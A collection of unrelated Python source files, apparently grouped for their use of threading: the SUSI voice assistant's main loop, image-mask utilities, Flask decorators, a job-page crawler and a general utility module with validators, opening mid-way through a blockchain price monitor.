if not block or not isinstance(block, int) or block <= last_block:
return
from_block = last_block
logger.debug(
f"Price/Liquidity monitor >>>> from_block:{from_block}, current_block:{block} <<<<"
)
ok = False
try:
dt_address_pool_list = self.get_dt_addresses_from_pool_logs(
from_block=from_block, to_block=block
)
self.update_dt_assets(dt_address_pool_list)
dt_address_exchange = self.get_dt_addresses_from_exchange_logs(
from_block=from_block, to_block=block
)
self.update_dt_assets_with_exchange_info(dt_address_exchange)
ok = True
except Exception as e:
logging.error(f"process_pool_events: {e}")
finally:
if ok and isinstance(block, int):
self.store_last_processed_block(block)
|
susi_loop.py | """
Processing logic of susi_linux
"""
import time
import os
import re
import logging
import queue
from threading import Thread, Timer, current_thread
from datetime import datetime
from urllib.parse import urljoin
import speech_recognition as sr
import requests
import json_config
import speech_recognition
from speech_recognition import Recognizer, Microphone
# from requests.exceptions import ConnectionError
from susi.config import SusiConfig
import susi.server_api as susi
from .hardware_components.lights import lights
from .internet_test import internet_on
from .action_scheduler import ActionScheduler
from .player import player
from .speech import TTS
logger = logging.getLogger(__name__)
try:
import RPi.GPIO as GPIO
except ImportError:
logger.warning("This device doesn't have GPIO port")
GPIO = None
class SusiLoop():
"""The main SUSI loop dealing with hotword detection, voice recognition,
server communication, action processing, etc"""
def __init__(self, renderer=None):
if GPIO:
try:
GPIO.setmode(GPIO.BCM)
GPIO.setup(27, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
except RuntimeError as e:
logger.error(e)
# thread1 = Thread(target=self.server_checker, name="ServerCheckerThread")
# thread1.daemon = True
# thread1.start()
recognizer = Recognizer()
# this was False in the old state machine, but reading the API docs
# https://github.com/Uberi/speech_recognition/blob/master/reference/library-reference.rst
# it seems that True is actually better!
recognizer.dynamic_energy_threshold = True
recognizer.energy_threshold = 2000
self.recognizer = recognizer
self.susi = susi
self.renderer = renderer
self.server_url = "https://127.0.0.1:4000"
self.action_schduler = ActionScheduler()
self.action_schduler.start()
self.event_queue = queue.Queue()
self.idle = True
self.supported_languages = None
self.hotword_thread = None
self.queue_loop_thread = None
try:
res = requests.get('http://ip-api.com/json').json()
self.susi.update_location(
longitude=res['lon'], latitude=res['lat'],
country_name=res['country'], country_code=res['countryCode'])
except ConnectionError as e:
logger.error(e)
self.susi_config = SusiConfig()
self.path_base = self.susi_config.get('path.base')
self.sound_detection = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.detection')))
self.sound_problem = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.problem')))
self.sound_error_recognition = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.error.recognition')))
self.sound_error_timeout = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.error.timeout')))
if self.susi_config.get('susi.mode') == 'authenticated':
try:
susi.sign_in(email=self.susi_config.get('susi.user'),
password=self.susi_config.get('susi.pass'))
except Exception as e:
logger.error('Some error occurred in login. Check you login details with susi-config.\n%s', e)
if self.susi_config.get('hotword.engine') == 'Snowboy':
from .hotword_engine.snowboy_detector import SnowboyDetector
hotword_model = "susi.pmdl"
if self.susi_config.get('hotword.model'):
logger.debug("Using configured hotword model: " + self.susi_config.get('hotword.model'))
hotword_model = self.susi_config.get('hotword_model')
self.hotword_detector = SnowboyDetector(model=hotword_model)
elif self.susi_config.get('hotword.engine') == 'PocketSphinx':
from .hotword_engine.sphinx_detector import PocketSphinxDetector
self.hotword_detector = PocketSphinxDetector()
elif self.susi_config.get('hotword.engine') == 'None':
self.hotword_detector = None
else:
raise ValueError(f"Unrecognized value for hotword.engine: {self.susi_config.get('hotword.engine')}")
if self.susi_config.get('wakebutton') == 'enabled':
logger.info("Susi has the wake button enabled")
if self.susi_config.get('device') == 'RaspberryPi':
logger.info("Susi runs on a RaspberryPi")
from .hardware_components.rpi_wake_button import RaspberryPiWakeButton
self.wake_button = RaspberryPiWakeButton()
else:
logger.warning("Susi is not running on a RaspberryPi")
self.wake_button = None
else:
logger.warning("Susi has the wake button disabled")
self.wake_button = None
stt = self.susi_config.get('stt')
if stt == 'google' or stt == 'watson' or stt == 'bing':
# for internet based services we assume any language supported
self.supported_languages = None
elif stt == 'pocketsphinx':
ps_data_dir = os.path.join(os.path.dirname(os.path.realpath(speech_recognition.__file__)), "pocketsphinx-data")
self.supported_languages = [ f.name for f in os.scandir(ps_data_dir) if f.is_dir() ]
logger.debug(f"Found supported languages for PocketSphinx: {self.supported_languages}")
elif stt == 'deepspeech-local':
ps_data_dir = os.path.join(os.path.dirname(os.path.realpath(speech_recognition.__file__)), "deepspeech-data")
self.supported_languages = [ f.name for f in os.scandir(ps_data_dir) if f.is_dir() ]
logger.debug(f"Found supported languages for DeepSpeech: {self.supported_languages}")
else:
self.supported_languages = None
logger.warn(f"Unknown stt setting: {stt}")
if self.susi_config.get('stt') == 'deepspeech-local':
self.microphone = Microphone(sample_rate=16000)
else:
self.microphone = Microphone()
if self.hotword_detector is not None:
self.hotword_detector.subject.subscribe(
on_next=lambda x: self.hotword_detected_callback())
if self.wake_button is not None:
self.wake_button.subject.subscribe(
on_next=lambda x: self.hotword_detected_callback())
if self.renderer is not None:
self.renderer.subject.subscribe(
on_next=lambda x: self.hotword_detected_callback())
if self.action_schduler is not None:
self.action_schduler.subject.subscribe(
on_next=lambda x: self.queue_event(x))
def queue_event(self, event):
""" queue a delayed event"""
self.event_queue.put(event)
def hotword_listener(self):
""" thread function for listening to the hotword"""
# this function never returns ...
self.hotword_detector.start()
def server_checker(self):
""" thread function for checking the used server being alive"""
response_one = None
test_params = {
'q': 'Hello',
'timezoneOffset': int(time.timezone / 60)
}
while response_one is None:
try:
logger.debug("checking for local server")
url = urljoin(self.server_url, '/susi/chat.json')
response_one = requests.get(url, test_params).result()
api_endpoint = self.server_url
susi.use_api_endpoint(api_endpoint)
except AttributeError:
time.sleep(10)
continue
except ConnectionError:
time.sleep(10)
continue
def start(self, background = False):
""" start processing of audio events """
self.start_hotword()
self.start_queue()
def is_queue_running(self):
return (self.queue_loop_thread and self.queue_loop_thread.is_alive())
def is_hotword_running(self):
return (self.hotword_thread and self.hotword_thread.is_alive())
def stop(self):
self.stop_hotword()
self.stop_queue()
def start_queue(self, background = False):
if background:
self.queue_loop_thread = Thread(target=self.queue_loop, name="QueueLoopThread")
self.queue_loop_thread.daemon = True
self.queue_loop_thread.start()
else:
self.queue_loop()
def stop_queue(self):
# cannot easily be implemented because python is stupid and doesn't allow
# stopping thread ...
pass
def start_hotword(self):
if self.hotword_detector is not None:
self.hotword_thread = Thread(target=self.hotword_listener, name="HotwordDetectorThread")
self.hotword_thread.daemon = True
self.hotword_thread.start()
def stop_hotword(self):
if self.hotword_thread:
self.hotword_detector.stop()
self.hotword_thread.join()
def queue_loop(self):
while True:
# block until events are available
ev = self.event_queue.get(block = True)
logger.debug("Got event from event queue, trying to deal with it")
# wait until idle
while True:
logger.debug("Waiting to become idle for planned action")
if not self.idle:
time.sleep(1)
continue
logger.debug("We are idle now ...")
self.idle = False
self.deal_with_answer(ev)
# back from processing
player.restore_softvolume()
if GPIO:
try:
GPIO.output(27, False)
GPIO.output(22, False)
except RuntimeError:
pass
self.idle = True
break
def notify_renderer(self, message, payload=None):
""" notify program renderer """
if self.renderer is not None:
self.renderer.receive_message(message, payload)
def hotword_detected_callback(self):
"""
Callback when the hotword is detected. Does the full processing
logic formerly contained in different states
"""
logger.debug("Entering hotword callback")
# don't do anything if we are already busy
if not self.idle:
logger.debug("Callback called while already busy, returning immediately from callback")
return
logger.debug("We are idle, so work on it!")
self.idle = False
# beep
player.beep(self.sound_detection)
if GPIO:
GPIO.output(22, True)
audio = None
logger.debug("notify renderer for listening")
self.notify_renderer('listening')
with self.microphone as source:
try:
logger.debug("listening to voice command")
audio = self.recognizer.listen(source, timeout=10.0, phrase_time_limit=5)
except sr.WaitTimeoutError:
logger.debug("timeout reached waiting for voice command")
self.deal_with_error('ListenTimeout')
logger.debug("delaying idle setting for 0.05s")
Timer(interval=0.05, function=self.set_idle).start()
return
if GPIO:
GPIO.output(22, False)
lights.off()
lights.think()
try:
logger.debug("Converting audio to text")
value = self.recognize_audio(audio=audio, recognizer=self.recognizer)
logger.debug("recognize_audio => %s", value)
self.notify_renderer('recognized', value)
if self.deal_with_answer(value):
pass
else:
logger.error("Error dealing with answer")
except sr.UnknownValueError as e:
logger.error("UnknownValueError from SpeechRecognition: %s", e)
self.deal_with_error('RecognitionError')
logger.debug("delaying idle setting for 0.05s")
Timer(interval=0.05, function=self.set_idle).start()
return
def set_idle(self):
logger.debug("Switching to idle mode")
self.notify_renderer('idle')
self.idle = True
def __speak(self, text):
"""Method to set the default TTS for the Speaker"""
tts = self.susi_config.get('tts')
if tts == 'google':
TTS.speak_google_tts(text)
elif tts == 'flite':
logger.info("Using flite for TTS") # indication for using an offline music player
TTS.speak_flite_tts(text)
elif tts == 'watson':
TTS.speak_watson_tts(text)
else:
raise ValueError("unknown key for tts", tts)
def recognize_audio(self, recognizer, audio):
"""Use the configured STT method to convert spoken audio to text"""
stt = self.susi_config.get('stt')
lang = self.susi_config.get('language')
# Try to adjust language to what is available
# None indicates any language supported, so use it as is
if self.supported_languages is not None:
if len(self.supported_languages) == 0:
raise ValueError(f"No supported language for the current STT {stt}")
if "en-US" in self.supported_languages:
default = "en-US"
else:
default = self.supported_languages[0]
if lang not in self.supported_languages:
if len(lang) < 2:
logger.warn(f"Unsupported language code {lang}, using {default}")
lang = default
else:
langshort = lang[0:2].lower()
for l in self.supported_languages:
if langshort == l[0:2].lower():
logger.debug(f"Using language code {l} instead of {lang}")
lang = l
break
# We should now have a proper language code in lang, if not, warn and reset
if lang not in self.supported_languages:
logger.warn(f"Unsupported langauge code {lang}, using {default}")
lang = default
logger.info("Trying to recognize audio with %s in language: %s", stt, lang)
if stt == 'google':
return recognizer.recognize_google(audio, language=lang)
elif stt == 'watson':
username = self.susi_config.get('watson.stt.user')
password = self.susi_config.get('watson.stt.pass')
return recognizer.recognize_ibm(
username=username, password=password, language=lang, audio_data=audio)
elif stt == 'pocket_sphinx':
return recognizer.recognize_sphinx(audio, language=lang)
elif stt == 'bing':
api_key = self.susi_config.get('bing.api')
return recognizer.recognize_bing(audio_data=audio, key=api_key, language=lang)
elif stt == 'deepspeech-local':
ds_data_dir = os.path.abspath(
os.path.join(
self.susi_config.get('path.base'),
self.susi_config.get('path.deepspeech'),
lang))
return recognizer.recognize_deepspeech(audio, language=lang, model_base_dir=ds_data_dir)
else:
logger.error(f"Unknown STT setting: {stt}")
logger.error("Using DeepSpeech!")
ds_data_dir = os.path.abspath(
os.path.join(
self.susi_config.get('path.base'),
self.susi_config.get('path.deepspeech'),
lang))
return recognizer.recognize_deepspeech(audio, language=lang, model_base_dir=ds_data_dir)
def deal_with_error(self, payload=None):
"""deal with errors happening during processing of audio events"""
if payload == 'RecognitionError':
logger.debug("ErrorState Recognition Error")
self.notify_renderer('error', 'recognition')
lights.speak()
player.say(self.sound_error_recognition)
lights.off()
elif payload == 'ConnectionError':
self.notify_renderer('error', 'connection')
self.susi_config.set('tts', 'flite')
self.susi_config.set('stt', 'pocketsphinx')
print("Internet Connection not available")
lights.speak()
lights.off()
logger.info("Changed to offline providers")
elif payload == 'ListenTimeout':
self.notify_renderer('error', 'timeout')
lights.speak()
player.say(self.sound_error_timeout)
lights.off()
else:
print("Error: {} \n".format(payload))
self.notify_renderer('error')
lights.speak()
player.say(self.sound_problem)
lights.off()
def deal_with_answer(self, payload=None):
"""processing logic - how to deal with answers from the server"""
try:
no_answer_needed = False
if isinstance(payload, str):
logger.debug("Sending payload to susi server: %s", payload)
reply = self.susi.ask(payload)
else:
logger.debug("Executing planned action response: %s", payload)
reply = payload
if GPIO:
GPIO.output(27, True)
self.notify_renderer('speaking', payload={'susi_reply': reply})
#if 'meta_action' in reply.keys():
# if reply['meta_action'] == "pause-voice":
if 'planned_actions' in reply.keys():
logger.debug("planning action: ")
for plan in reply['planned_actions']:
logger.debug("plan = " + str(plan))
# plan answers look like this:
# plan = {'planned_actions': [{'language': 'en', 'answer': 'ALARM', 'plan_delay': 300001,
# 'plan_date': '2020-01-09T02:05:10.377Z'}], 'language': 'en', 'answer': 'alarm set for in 5 minutes'}
# we use time.time as timefunc for scheduler, so we need to convert the
# delay and absolute time to the same format, that is float of sec since epoch
# Unfortunately, Python is tooooooo stupid to provide ISO standard confirm standard
# library. datetime.fromisoformat sounds like perfectly made, only that it doesn't
# parse the Z postfix, congratulations.
# https://discuss.python.org/t/parse-z-timezone-suffix-in-datetime/2220
# Replace it manually with +00:00
# We send both the delay and absolute time in case one of the two is missing
# the scheduler prefers the delay value
plan_date_sec = datetime.fromisoformat(re.sub('Z$', '+00:00', plan['plan_date'])).timestamp()
self.action_schduler.add_event(int(plan['plan_delay']) / 1000, plan_date_sec, plan)
# first responses WITHOUT answer key!
# {'answer': 'Audio volume is now 10 percent.', 'volume': '10'}
if 'volume' in reply.keys():
no_answer_needed = True
player.volume(reply['volume'])
player.say(self.sound_detection)
if 'media_action' in reply.keys():
action = reply['media_action']
if action == 'pause':
no_answer_needed = True
player.pause()
lights.off()
lights.wakeup()
elif action == 'resume':
no_answer_needed = True
player.resume()
elif action == 'restart':
no_answer_needed = True
player.restart()
elif action == 'next':
no_answer_needed = True
player.next()
elif action == 'previous':
no_answer_needed = True
player.previous()
elif action == 'shuffle':
no_answer_needed = True
player.shuffle()
else:
logger.error('Unknown media action: %s', action)
# {'stop': <susi_python.models.StopAction object at 0x7f4641598d30>}
if 'stop' in reply.keys():
no_answer_needed = True
player.stop()
if 'answer' in reply.keys():
logger.info('Susi: %s', reply['answer'])
lights.off()
lights.speak()
self.__speak(reply['answer'])
lights.off()
else:
if not no_answer_needed and 'identifier' not in reply.keys():
lights.off()
lights.speak()
self.__speak("I don't have an answer to this")
lights.off()
if 'language' in reply.keys():
answer_lang = reply['language']
if answer_lang != self.susi_config.get("language"):
logger.info("Switching language to: %s", answer_lang)
# switch language
self.susi_config.set('language', answer_lang)
# answer to "play ..."
# {'identifier': 'ytd-04854XqcfCY', 'answer': 'Playing Queen - We Are The Champions (Official Video)'}
if 'identifier' in reply.keys():
url = reply['identifier']
logger.debug("Playing " + url)
if url[:3] == 'ytd':
player.playytb(url[4:])
else:
player.play(url)
if 'table' in reply.keys():
table = reply['table']
for h in table.head:
print('%s\t' % h, end='')
self.__speak(h)
print()
for datum in table.data[0:4]:
for value in datum:
print('%s\t' % value, end='')
self.__speak(value)
print()
if 'rss' in reply.keys():
rss = reply['rss']
entities = rss['entities']
count = rss['count']
for entity in entities[0:count]:
logger.debug(entity.title)
self.__speak(entity.title)
except ConnectionError:
self.deal_with_error('ConnectionError')
return False
except Exception as e:
logger.error('Unknown error: %s', e)
return False
return True
|
image.py | import numpy as np
from PIL import Image
import torch
import threading
_palette = [
0, 0, 0, 128, 0, 0, 0, 128, 0, 128, 128, 0, 0, 0, 128, 128, 0, 128, 0, 128,
128, 128, 128, 128, 64, 0, 0, 191, 0, 0, 64, 128, 0, 191, 128, 0, 64, 0,
128, 191, 0, 128, 64, 128, 128, 191, 128, 128, 0, 64, 0, 128, 64, 0, 0,
191, 0, 128, 191, 0, 0, 64, 128, 128, 64, 128, 22, 22, 22, 23, 23, 23, 24,
24, 24, 25, 25, 25, 26, 26, 26, 27, 27, 27, 28, 28, 28, 29, 29, 29, 30, 30,
30, 31, 31, 31, 32, 32, 32, 33, 33, 33, 34, 34, 34, 35, 35, 35, 36, 36, 36,
37, 37, 37, 38, 38, 38, 39, 39, 39, 40, 40, 40, 41, 41, 41, 42, 42, 42, 43,
43, 43, 44, 44, 44, 45, 45, 45, 46, 46, 46, 47, 47, 47, 48, 48, 48, 49, 49,
49, 50, 50, 50, 51, 51, 51, 52, 52, 52, 53, 53, 53, 54, 54, 54, 55, 55, 55,
56, 56, 56, 57, 57, 57, 58, 58, 58, 59, 59, 59, 60, 60, 60, 61, 61, 61, 62,
62, 62, 63, 63, 63, 64, 64, 64, 65, 65, 65, 66, 66, 66, 67, 67, 67, 68, 68,
68, 69, 69, 69, 70, 70, 70, 71, 71, 71, 72, 72, 72, 73, 73, 73, 74, 74, 74,
75, 75, 75, 76, 76, 76, 77, 77, 77, 78, 78, 78, 79, 79, 79, 80, 80, 80, 81,
81, 81, 82, 82, 82, 83, 83, 83, 84, 84, 84, 85, 85, 85, 86, 86, 86, 87, 87,
87, 88, 88, 88, 89, 89, 89, 90, 90, 90, 91, 91, 91, 92, 92, 92, 93, 93, 93,
94, 94, 94, 95, 95, 95, 96, 96, 96, 97, 97, 97, 98, 98, 98, 99, 99, 99,
100, 100, 100, 101, 101, 101, 102, 102, 102, 103, 103, 103, 104, 104, 104,
105, 105, 105, 106, 106, 106, 107, 107, 107, 108, 108, 108, 109, 109, 109,
110, 110, 110, 111, 111, 111, 112, 112, 112, 113, 113, 113, 114, 114, 114,
115, 115, 115, 116, 116, 116, 117, 117, 117, 118, 118, 118, 119, 119, 119,
120, 120, 120, 121, 121, 121, 122, 122, 122, 123, 123, 123, 124, 124, 124,
125, 125, 125, 126, 126, 126, 127, 127, 127, 128, 128, 128, 129, 129, 129,
130, 130, 130, 131, 131, 131, 132, 132, 132, 133, 133, 133, 134, 134, 134,
135, 135, 135, 136, 136, 136, 137, 137, 137, 138, 138, 138, 139, 139, 139,
140, 140, 140, 141, 141, 141, 142, 142, 142, 143, 143, 143, 144, 144, 144,
145, 145, 145, 146, 146, 146, 147, 147, 147, 148, 148, 148, 149, 149, 149,
150, 150, 150, 151, 151, 151, 152, 152, 152, 153, 153, 153, 154, 154, 154,
155, 155, 155, 156, 156, 156, 157, 157, 157, 158, 158, 158, 159, 159, 159,
160, 160, 160, 161, 161, 161, 162, 162, 162, 163, 163, 163, 164, 164, 164,
165, 165, 165, 166, 166, 166, 167, 167, 167, 168, 168, 168, 169, 169, 169,
170, 170, 170, 171, 171, 171, 172, 172, 172, 173, 173, 173, 174, 174, 174,
175, 175, 175, 176, 176, 176, 177, 177, 177, 178, 178, 178, 179, 179, 179,
180, 180, 180, 181, 181, 181, 182, 182, 182, 183, 183, 183, 184, 184, 184,
185, 185, 185, 186, 186, 186, 187, 187, 187, 188, 188, 188, 189, 189, 189,
190, 190, 190, 191, 191, 191, 192, 192, 192, 193, 193, 193, 194, 194, 194,
195, 195, 195, 196, 196, 196, 197, 197, 197, 198, 198, 198, 199, 199, 199,
200, 200, 200, 201, 201, 201, 202, 202, 202, 203, 203, 203, 204, 204, 204,
205, 205, 205, 206, 206, 206, 207, 207, 207, 208, 208, 208, 209, 209, 209,
210, 210, 210, 211, 211, 211, 212, 212, 212, 213, 213, 213, 214, 214, 214,
215, 215, 215, 216, 216, 216, 217, 217, 217, 218, 218, 218, 219, 219, 219,
220, 220, 220, 221, 221, 221, 222, 222, 222, 223, 223, 223, 224, 224, 224,
225, 225, 225, 226, 226, 226, 227, 227, 227, 228, 228, 228, 229, 229, 229,
230, 230, 230, 231, 231, 231, 232, 232, 232, 233, 233, 233, 234, 234, 234,
235, 235, 235, 236, 236, 236, 237, 237, 237, 238, 238, 238, 239, 239, 239,
240, 240, 240, 241, 241, 241, 242, 242, 242, 243, 243, 243, 244, 244, 244,
245, 245, 245, 246, 246, 246, 247, 247, 247, 248, 248, 248, 249, 249, 249,
250, 250, 250, 251, 251, 251, 252, 252, 252, 253, 253, 253, 254, 254, 254,
255, 255, 255
]
def label2colormap(label):
m = label.astype(np.uint8)
r, c = m.shape
cmap = np.zeros((r, c, 3), dtype=np.uint8)
cmap[:, :, 0] = (m & 1) << 7 | (m & 8) << 3 | (m & 64) >> 1
cmap[:, :, 1] = (m & 2) << 6 | (m & 16) << 2 | (m & 128) >> 2
cmap[:, :, 2] = (m & 4) << 5 | (m & 32) << 1
return cmap
def one_hot_mask(mask, cls_num):
if len(mask.size()) == 3:
mask = mask.unsqueeze(1)
indices = torch.arange(0, cls_num + 1,
device=mask.device).view(1, -1, 1, 1)
return (mask == indices).float()
def masked_image(image, colored_mask, mask, alpha=0.7):
mask = np.expand_dims(mask > 0, axis=0)
mask = np.repeat(mask, 3, axis=0)
show_img = (image * alpha + colored_mask *
(1 - alpha)) * mask + image * (1 - mask)
return show_img
def save_image(image, path):
im = Image.fromarray(np.uint8(image * 255.).transpose((1, 2, 0)))
im.save(path)
def _save_mask(mask, path, squeeze_idx=None):
if squeeze_idx is not None:
unsqueezed_mask = mask * 0
for idx in range(1, len(squeeze_idx)):
obj_id = squeeze_idx[idx]
mask_i = mask == idx
unsqueezed_mask += (mask_i * obj_id).astype(np.uint8)
mask = unsqueezed_mask
mask = Image.fromarray(mask).convert('P')
mask.putpalette(_palette)
mask.save(path)
def save_mask(mask_tensor, path, squeeze_idx=None):
mask = mask_tensor.cpu().numpy().astype('uint8')
threading.Thread(target=_save_mask, args=[mask, path, squeeze_idx]).start()
def flip_tensor(tensor, dim=0):
inv_idx = torch.arange(tensor.size(dim) - 1, -1, -1,
device=tensor.device).long()
tensor = tensor.index_select(dim, inv_idx)
return tensor
def shuffle_obj_mask(mask):
bs, obj_num, _, _ = mask.size()
new_masks = []
for idx in range(bs):
now_mask = mask[idx]
random_matrix = torch.eye(obj_num, device=mask.device)
fg = random_matrix[1:][torch.randperm(obj_num - 1)]
random_matrix = torch.cat([random_matrix[0:1], fg], dim=0)
now_mask = torch.einsum('nm,nhw->mhw', random_matrix, now_mask)
new_masks.append(now_mask)
return torch.stack(new_masks, dim=0)
|
decorators.py | from threading import Thread
from functools import wraps
from flask import g, make_response, jsonify
def async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
def auth_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if not g.user.is_authenticated():
return make_response(jsonify({'error': 'Unauthorized access'}), 403)
return f(*args, **kwargs)
return decorated_function
|
findJobs.py | import sys, Queue, re, urllib, urlparse, time, os, sys
from threading import Thread
dupcheck = set()
def saveCareers(link,key,loc):
print "job match found at ", link
filename="jobs/"
filename+=loc
filename+="-"
filename+=key
if os.path.exists(filename):
append_write='a'
else:
append_write='w'
outfile=open(filename, append_write)
outfile.write(link)
outfile.write("\n")
outfile.close()
def checkListing(link, keyword,loc):
try:
print "career page found at", link
html = urllib.urlopen(link).read()
matches = re.findall(keyword,html,re.I)
if len(matches) != 0:
saveCareers(link,keyword, loc)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
pass
def getCareers(html, origLink, keyword, loc):
for url in re.findall('''<a[^>]+href=["'](.[^"']+)["']>careers</a>''', html, re.I):
link = url.split("#", 1)[0] if url.startswith("http") else '{uri.scheme}://{uri.netloc}'.format(uri=urlparse.urlparse(origLink)) + url.split("#", 1)[0]
if link in dupcheck:
continue
dupcheck.add(link)
if len(dupcheck) > 99999:
dupcheck.clear()
checkListing(link,keyword, loc)
def findCareers(link,keyword, loc):
try:
print "crawling", link
html = urllib.urlopen(link).read()
print "page = ", html
getCareers(html, link, keyword, loc)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
pass
def webCrawl(start_page, job_keyword, loc, threads):
print "spawning thread"
threads.append(Thread( target=findCareers, args=(start_page, job_keyword, loc)))
threads[-1].start()
print "webcrawl return"
|
util.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
import base64
import copy
import datetime
import functools
import hashlib
import ipaddr
import json
import logging
import math
import re
import six
import time
import types
import urllib
import uuid
from six import iteritems
logger = logging.getLogger('threathunter_common.util')
__author__ = "nebula"
md5string = lambda x: hashlib.md5(utf8(x)).hexdigest()
def province_filter(province):
"""
去掉省份 市等信息
"""
return province.replace(u"市", '').replace(u"省", '').replace(u"自治区", '').replace(u"维吾尔自治区", '').replace(u"特别行政区",
'').replace(
u"回族自治区", '')
def chunks(listdata, n):
"""
Author:wxt
将一个列表的数据平分
"""
m = int(math.ceil(len(listdata) / float(n)))
return [listdata[i:i + m] for i in range(0, len(listdata), m)]
def get_root_domain(url):
"""
Author:wxt
获取url的根域名
"""
import re
reg = r'^https?:\/\/([a-z0-9\-\.]+)[\/\?]?'
m = re.match(reg, url)
if m:
uri = m.groups()[0]
else:
uri = url
uri = uri[:uri.find('/')]
return uri[uri.rfind('.', 0, uri.rfind('.')) + 1:]
def random16bit():
"""
Author:wxt
返回随机16位字符串
"""
return hashlib.md5(str(uuid.uuid4())).hexdigest().upper()[:16]
class AttribDict(dict):
"""
Author:wxt
使用.遍历value
>>> foo = AttribDict()
>>> foo.bar = 1
>>> foo.bar
1
"""
def __init__(self, indict=None, attribute=None):
if indict is None:
indict = {}
# Set any attributes here - before initialisation
# these remain as normal attributes
self.attribute = attribute
dict.__init__(self, indict)
self.__initialised = True
# After initialisation, setting attributes
# is the same as setting an item
def __getattr__(self, item):
"""
Maps values to attributes
Only called if there *is NOT* an attribute with this name
"""
try:
ret = self.__getitem__(item)
if hasattr(ret, '__get__'):
return ret.__get__(self, AttribDict)
return ret
except KeyError:
return None
# raise Exception("unable to access item '%s'" % item)
def __setattr__(self, item, value):
"""
Maps attributes to values
Only if we are initialised
"""
# This test allows attributes to be set in the __init__ method
if "_AttribDict__initialised" not in self.__dict__:
return dict.__setattr__(self, item, value)
# Any normal attributes are handled normally
elif item in self.__dict__:
dict.__setattr__(self, item, value)
else:
self.__setitem__(item, value)
def __getstate__(self):
return self.__dict__
def __setstate__(self, dict):
self.__dict__ = dict
def __deepcopy__(self, memo):
retVal = self.__class__()
memo[id(self)] = retVal
for attr in dir(self):
if not attr.startswith('_'):
value = getattr(self, attr)
if not isinstance(value, (
types.BuiltinFunctionType, types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
setattr(retVal, attr, copy.deepcopy(value, memo))
for key, value in self.items():
retVal.__setitem__(key, copy.deepcopy(value, memo))
return retVal
def cn_name_match(cn_name):
"""
中文姓名合法性验证
"""
chre = re.compile(r'^[\u2e80-\ufe4f]+([\u00b7][\u2e80-\ufe4f]+)*$')
cn_name = unicode(cn_name.decode("utf-8"))
mat = chre.match(cn_name)
if mat and 1 < len(cn_name) <= 30:
return True
else:
return False
def ip_match(ip, check_public=False):
"""
Author: wxt
IP地址验证
@param check_public True:验证公网地址
"""
ip_exp = re.compile(
"^(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9])\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]|0)\.(25[0-5]|2[0-4][0-9]|[0-1]{1}[0-9]{2}|[1-9]{1}[0-9]{1}|[0-9])$")
if ip_exp.match(ip):
if check_public:
_ip = ipaddr.IPAddress(ip)
if _ip.is_link_local or _ip.is_loopback or _ip.is_private:
return False
return True
else:
return False
def mobile_match(mobile):
"""
Author:wxt
手机号码验证
"""
# mobile_exp = re.compile("^(13[0-9]|14[01345789]|15[0-9]|17[012356789]|18[0-9])[0-9]{8}$")
# mobile_exp = re.compile("^(13[0-9]|14[01345789]|15[0-9]|17[012356789]|18[0-9]|199)[0-9]{8}$")
mobile_exp = re.compile("^(13[0-9]|14[01345789]|15[0-9]|16[6]|17[012356789]|18[0-9]|19[89])[0-9]{8}$")
if mobile_exp.match(mobile):
return True
else:
return False
def identity_card_match(id_number):
"""
身份证号码验证
:param id_number:
:return: Boolean
"""
if type(id_number) is int:
id_number = str(id_number)
if type(id_number) is str:
try:
int(id_number[:17])
except ValueError:
return False
regex = r'^(^[1-9]\d{7}((0\d)|(1[0-2]))(([0|1|2]\d)|3[0-1])\d{3}$)|(^[1-9]\d{5}[1-9]\d{3}((0\d)|(1[0-2]))(([0|1|2]\d)|3[0-1])((\d{4})|\d{3}[Xx])$)$'
if len(re.findall(regex, id_number)) == 0:
return False
if len(id_number) == 15:
return True
if len(id_number) == 18:
Wi = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
Ti = ['1', '0', 'x', '9', '8', '7', '6', '5', '4', '3', '2']
sum = 0
code = id_number[:17]
for i in range(17):
sum += int(code[i]) * Wi[i]
if id_number[17:].lower() == Ti[sum % 11]:
return True
return False
class I18n(object):
"""
Author: wxt
翻译模块
"""
default_word_dict = {
"": "空"
}
def __init__(self):
pass
def set_word_dict(self, dict_key="", word_dict={}):
setattr(self, dict_key, word_dict)
def translate(self, word, word_dict=None):
if not word_dict:
word_dict = self.default_word_dict
elif isinstance(word_dict, dict):
pass
else:
word_dict = getattr(self, word_dict)
if word_dict.has_key(word):
return word_dict[word]
else:
return word
def curr_timestamp():
"""
Author: wxt
返回当前10位时间戳
"""
return int(time.time())
def json_dumps(obj, pretty=False):
return json.dumps(obj, sort_keys=True, indent=4, separators=(',', ': ')) if pretty else json.dumps(obj)
def get_system_encoding():
import codecs
import locale
return codecs.lookup(locale.getpreferredencoding(())).name
class ReadOnlyDict(dict):
"""A Read Only Dict"""
def __setitem__(self, key, value):
raise Exception("dict is read-only")
def getitem(obj, key=0, default=None):
"""Get first element of list or return default"""
try:
return obj[key]
except:
return default
def hide_me(tb, g=globals()):
"""Hide stack traceback of given stack"""
base_tb = tb
try:
while tb and tb.tb_frame.f_globals is not g:
tb = tb.tb_next
while tb and tb.tb_frame.f_globals is g:
tb = tb.tb_next
except Exception as e:
logging.exception(e)
tb = base_tb
if not tb:
tb = base_tb
return tb
def run_in_thread(func, *args, **kwargs):
"""Run function in thread, return a Thread object"""
from threading import Thread
thread = Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
def run_in_subprocess(func, *args, **kwargs):
"""Run function in subprocess, return a Process object"""
from multiprocessing import Process
